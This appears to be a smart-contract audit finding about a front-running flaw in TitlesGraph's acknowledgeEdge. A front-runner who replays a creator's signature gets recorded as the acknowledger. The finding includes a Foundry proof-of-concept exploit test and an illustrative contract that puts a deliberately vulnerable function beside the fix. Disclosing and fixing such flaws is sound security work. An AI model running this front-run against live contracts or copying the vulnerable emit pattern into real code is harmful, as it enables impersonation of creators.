zoyi

medium

Anyone can grief acknowledgements

Duplicate of #273

Summary

Front-running and copying an acknowledgement can lead to spoofing.

Vulnerability Detail

A person can call `acknowledgeEdge` to acknowledge an edge. There are two variants, one without an ECDSA signature and one with an ECDSA signature.

The problem is that a malicious user can front-run any `acknowledgement` made, spoofing himself as the person that made the acknowledgement. Spoofing the address has been confirmed as a potential issue by the sponsor.

Proof of Concept

Put this in `TitleGraph.t.sol`:

```solidity
function test_poc_ack() public {
    Mock1271Signer signer = new Mock1271Signer();
    bytes memory jtmb = signer.JTMB();
    address malicious_user = makeAddr("malicious_user");
    Edge memory edge = Edge({
        from: Node({
            nodeType: NodeType.COLLECTION_ERC1155,
            entity: Target({target: address(this), chainId: block.chainid}),
            creator: Target({target: address(2), chainId: block.chainid}),
            data: ""
        }),
        to: Node({
            nodeType: NodeType.TOKEN_ERC1155,
            entity: Target({target: address(3), chainId: block.chainid}),
            creator: Target({target: address(signer), chainId: block.chainid}),
            data: abi.encode(42)
        }),
        acknowledged: true,
        data: ""
    });
    // Create the edge
    titlesGraph.createEdge(edge.from, edge.to, "");
    bytes32 edgeId = titlesGraph.getEdgeId(edge);
    // This is the signer's valid acknowledgement; it gets front-run by the malicious user
    // titlesGraph.acknowledgeEdge(edgeId, new bytes(0), jtmb);
    // The front-running call succeeds, with malicious_user recorded as the acknowledger
    vm.prank(malicious_user);
    titlesGraph.acknowledgeEdge(edgeId, new bytes(0), jtmb);
    // If the original signer then tries to acknowledge, the call reverts
    vm.expectRevert(Unauthorized.selector);
    titlesGraph.acknowledgeEdge(edgeId, new bytes(0), jtmb);
}
```

If we look at the traces we will see that the `malicious_user` will be the address that acknowledged the edge. This is especially problematic with the issue of address poisoning.

Impact

A malicious user can craft an address that looks very similar to a big AI artist and spoof an acknowledgement coming from them.

Code Snippet

TitlesGraph.sol#L118-L124

Tool used

Manual Review

Recommendation

Do not emit `msg.sender` as the acknowledger.
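To make the recommendation concrete, here is an added, simplified contract that is not the TitlesGraph code (the `Edge` layout, the digest the creator signs, the `EdgeAcknowledged` event and the `Unauthorized` error are assumptions). It places the vulnerable emit beside the corrected one: the recorded acknowledger must be the address whose ERC-1271 signature was verified, not whoever relayed the transaction.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustration, not the TitlesGraph code: the Edge layout, the digest
// that the creator signs, and the event shape are assumptions.
interface IERC1271 {
    function isValidSignature(bytes32 hash, bytes calldata signature) external view returns (bytes4);
}

contract AckDemo {
    struct Edge { address creator; bool acknowledged; }

    mapping(bytes32 => Edge) public edges;

    event EdgeAcknowledged(bytes32 indexed edgeId, address indexed acknowledger, bytes data);

    error Unauthorized();

    // Validates the ERC-1271 signature against the edge's creator and returns
    // that creator, i.e. the only address the signature actually proves.
    function _verifySigner(bytes32 edgeId, bytes calldata signature) internal view returns (address signer) {
        signer = edges[edgeId].creator;
        bytes32 digest = keccak256(abi.encode(edgeId)); // assumed signing scheme
        if (IERC1271(signer).isValidSignature(digest, signature) != IERC1271.isValidSignature.selector) {
            revert Unauthorized();
        }
    }

    // Vulnerable pattern: whoever relays the creator's valid signature (a
    // front-runner included) is emitted as the acknowledger.
    function acknowledgeEdgeVulnerable(bytes32 edgeId, bytes calldata data, bytes calldata signature) external {
        _verifySigner(edgeId, signature);
        edges[edgeId].acknowledged = true;
        emit EdgeAcknowledged(edgeId, msg.sender, data);
    }

    // Fixed pattern: emit the verified signer, so front-running the transaction
    // changes who pays the gas but not who is recorded as acknowledging.
    function acknowledgeEdge(bytes32 edgeId, bytes calldata data, bytes calldata signature) external {
        address signer = _verifySigner(edgeId, signature);
        edges[edgeId].acknowledged = true;
        emit EdgeAcknowledged(edgeId, signer, data);
    }
}
```

Off-chain indexers that read `EdgeAcknowledged` then attribute the acknowledgement to the signer regardless of which account submitted the transaction.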